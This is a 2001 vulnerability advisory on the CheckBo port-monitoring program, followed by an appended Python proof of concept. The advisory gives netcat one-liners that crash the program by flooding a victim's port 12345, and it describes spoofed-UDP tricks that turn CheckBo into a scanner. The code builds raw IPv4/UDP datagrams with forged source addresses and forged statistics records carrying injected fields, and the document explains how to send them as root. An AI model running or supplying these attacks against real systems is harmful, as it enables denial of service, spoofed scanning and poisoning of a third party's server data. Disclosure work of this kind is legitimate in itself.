######################################################################

Luigi Auriemma

Application:  CheckBo (http://www.checkbo.com)
Version:      1.56 (this is the last one, no new versions have been released)
              The first attack works only on Win9x/Me systems
Bug:          Memo overflow and UDP problems
              80,000 bytes sent to one of the TCP ports opened on the victim
              The program can be turned into a "TCP scanner", and the
              Statistics page on the web-site can be filled with customized
              and spoofed data
Date:         20 Apr 2001
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

######################################################################

===============
1) Introduction
===============

CheckBo is a freeware application, fairly widespread in Italy, that is
meant to detect possible attacks or scans by script-kiddies.
Unfortunately the program uses a poor method for these checks: it simply
listens on a number of well-known trojan ports (12345, 31337 and so on).
So this program is not secure; it is better to say that it creates new
bugs and new worries for the user that runs it.

The program binds the following ports: 54320, 54321 UDP, 31337 UDP,
20034, 12345, 12346, 31337, 31666, 1243 and 6713.

######################################################################

======
2) Bug
======

A] Memo overflow (?)
====================

This first bug is not a real buffer overflow but bad handling of the memo
space on Win9x/Me systems.
The problem is that CheckBo shows all the data that the attacker sends to
its ports. So the attacker simply sends a lot of data: the victim will see
some alert messages and, when the user closes the last dialog box, the
program will be closed automatically.
The size of the "bad" data must be at least 80,000 bytes.

B] Defense program or attack program?
=====================================

Yes, this program can easily be used to turn the victim into an attacker.
When someone tries to connect to a port where CheckBo listens, the program
gathers some information about the remote host. First it resolves the IP
into a hostname, then it tries to scan the following ports:

- 139   = Windows Netbios
- 1503  = Netmeeting calls (?)
- 80    = Http
- 12345 = Netbus
- 31337 = Backorifice

So it is easy to imagine an attacker who wants to have fun with the victim
sending a spoofed UDP packet to his 31337 or 54321 ports: CheckBo will then
resolve and scan whatever source address the attacker put in the packet.
The best result is obtained with a UDP packet having the same source and
destination IP addresses, so CheckBo starts an infinite loop of checks
against itself 8-) (this can also be counted as another bug...)

C] Faked statistics page
========================

CheckBo has an interesting option (on by default) that is used to send log
data to the CheckBo server log.checkbo.com.
It sends a UDP packet to port 14188, and this is its structure in C
language:

  "%s ; %t ; Remote IP: %s ; %s ; Port: %d ; Local Port: %d ; Type: %s"

The following is a real packet:

< 43 68 65 63 6b 42 4f 2d 31 2e 35 35 43 46 20 3b   # CheckBO-1.55CF ;
< 20 57 65 64 20 4a 75 6c 20 30 34 20 30 35 3a 31   #  Wed Jul 04 05:1
< 35 3a 32 34 20 31 39 38 34 0a 20 3b 20 52 65 6d   # 5:24 1984. ; Rem
< 6f 74 65 20 49 50 3a 20 31 39 32 2e 31 36 38 2e   # ote IP: 192.168.
< 30 2e 32 20 3b 20 44 4e 53 20 6e 6f 6e 20 64 69   # 0.2 ; DNS non di
< 73 70 6f 6e 69 62 69 6c 65 20 3b 20 50 6f 72 74   # sponibile ; Port
< 3a 20 31 30 38 33 20 3b 20 4c 6f 63 61 6c 20 50   # : 1083 ; Local P
< 6f 72 74 3a 20 32 30 30 33 34 20 3b 20 54 79 70   # ort: 20034 ; Typ
< 65 3a 20 41 74 74 61 63 63 6f 20 4e 65 74 42 75   # e: Attacco NetBu
< 73 20 50 52 4f                                    # s PRO

(the Italian strings mean "DNS not available" and "NetBus PRO attack";
note the 0a byte: the timestamp keeps the trailing newline of asctime())

All the fields are strings, so we can put WHAT_WE_WANT in each field.
Naturally this system is also very insecure for the server, which can be
taken down very easily 8-)
You can view your statistics here: http://www.checkbo.com/statat.asp

######################################################################

===========
3) The Code
===========

Download this zip from:
http://aluigi.org/poc/checkbo.zip

For bug A] you can also use these two methods (replace <victim> with the
IP address or hostname of the target):

1) perl -e 'for($i=0;$i<80000;$i++) { print "A"; }' | nc <victim> 12345

2) nc <victim> 12345 < 80Kbfile.txt

For problem B] use a simple UDP spoofer utility like HPing2, which can be
downloaded from http://www.kyuzz.org/antirez/hping2.html

######################################################################

======
4) Fix
======

No fix.
I suggest deleting this program because it is useless and dangerous.

######################################################################
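A worked example, added here and not part of the advisory, of the checkbo.zip
proof of concept or of CheckBo itself, covering bugs B] and C] together: it
builds a UDP datagram with a forged source address (the spoofing step the
advisory delegates to HPing2) and the statistics record for log.checkbo.com
in the format captured above. The record format and the captured packet are
taken from the advisory; the IPv4/UDP header construction, the raw-socket
sender, the naive " ; " server-side split, and every sample address, port and
field value are this example's own assumptions.

```python
"""Forge the two kinds of UDP traffic CheckBo trusts blindly (added example):

  * bug B: a probe whose source address is spoofed; with source equal to
    destination CheckBo starts scanning its own host;
  * bug C: a statistics record with attacker-chosen fields, including a
    " ; " separator smuggled inside a free-form field.

Record format and captured packet come from the advisory; everything else
(header builder, raw sender, sample values, log-server address) is assumed.
"""
import socket
import struct

LOG_SERVER_PORT = 14188          # port of log.checkbo.com (from the advisory)
CHECKBO_UDP_PORTS = (54321, 31337)   # UDP ports CheckBo listens on (advisory)

# Format quoted in the advisory; %t is an asctime()-style timestamp that
# keeps its trailing "\n", as the captured packet shows.
RECORD_FMT = "%s ; %s ; Remote IP: %s ; %s ; Port: %d ; Local Port: %d ; Type: %s"

# Packet captured in the advisory ("DNS non disponibile" = DNS not available,
# "Attacco NetBus PRO" = NetBus PRO attack).
CAPTURED = (b"CheckBO-1.55CF ; Wed Jul 04 05:15:24 1984\n ; Remote IP: 192.168.0.2"
            b" ; DNS non disponibile ; Port: 1083 ; Local Port: 20034"
            b" ; Type: Attacco NetBus PRO")


def build_log_record(version, timestamp, remote_ip, dns, port, local_port, kind):
    """Build a statistics record exactly as CheckBo sends it.  Text fields
    are copied verbatim, so anything the caller passes reaches the server."""
    return (RECORD_FMT % (version, timestamp, remote_ip, dns,
                          port, local_port, kind)).encode("latin-1")


def split_log_record(record):
    """Assumed server-side parse (the real server code is not available):
    split on ' ; '.  A separator injected into one field shifts every
    following column."""
    return record.decode("latin-1").split(" ; ")


def ip_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_udp_datagram(src_ip, dst_ip, sport, dport, payload, ident=0x1234):
    """Return a complete IPv4 + UDP datagram with an arbitrary source address.
    The UDP checksum is left at zero, which IPv4 allows ("no checksum")."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    header = struct.pack("!BBHHHBBH4s4s",
                         0x45,                    # version 4, IHL 5 (20 bytes)
                         0,                       # TOS
                         20 + len(udp),           # total length
                         ident, 0,                # identification, flags/frag
                         64, socket.IPPROTO_UDP,  # TTL, protocol 17
                         0,                       # checksum placeholder
                         socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    header = header[:10] + struct.pack("!H", ip_checksum(header)) + header[12:]
    return header + udp


def send_raw(datagram, dst_ip):
    """Hand a forged datagram to the kernel (needs root / CAP_NET_RAW).
    Not called by the demo below."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
    sock.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
    sock.sendto(datagram, (dst_ip, 0))
    sock.close()


def self_scan_probe(victim_ip, port=31337):
    """Bug B: source == destination, so CheckBo 'investigates' its own host."""
    return build_udp_datagram(victim_ip, victim_ip, port, port, b"\x00")


def forged_statistics(victim_ip="192.168.0.2", log_server_ip="203.0.113.10"):
    """Bug C: a record blaming an address of our choice, with three extra
    columns smuggled through the free-form DNS field.  All values are
    constructed; log_server_ip is a placeholder for log.checkbo.com."""
    record = build_log_record(
        "CheckBO-1.56", "Fri Apr 20 00:00:00 2001\n", "10.1.1.1",
        "evil.example ; Port: 1 ; Local Port: 1 ; Type: forged",
        31337, 31337, "Back Orifice")
    # Spoof the sender too, so the entry is credited to the victim's address.
    return build_udp_datagram(victim_ip, log_server_ip, 1024,
                              LOG_SERVER_PORT, record)


if __name__ == "__main__":
    assert build_log_record("CheckBO-1.55CF", "Wed Jul 04 05:15:24 1984\n",
                            "192.168.0.2", "DNS non disponibile", 1083, 20034,
                            "Attacco NetBus PRO") == CAPTURED
    print(split_log_record(CAPTURED))                 # 7 columns
    print(split_log_record(forged_statistics()[28:])) # 10 columns
    print(self_scan_probe("192.168.0.2").hex())
```

`build_log_record` reproduces the captured packet byte for byte, which is how to check that the format string was read correctly; `forged_statistics` then shows that because every column is free text, the DNS field alone can carry three more columns. To actually emit the datagrams pass them to `send_raw` as root; the IPv4 source address is whatever `build_udp_datagram` was given, which is all HPing2 does for the spoofing step.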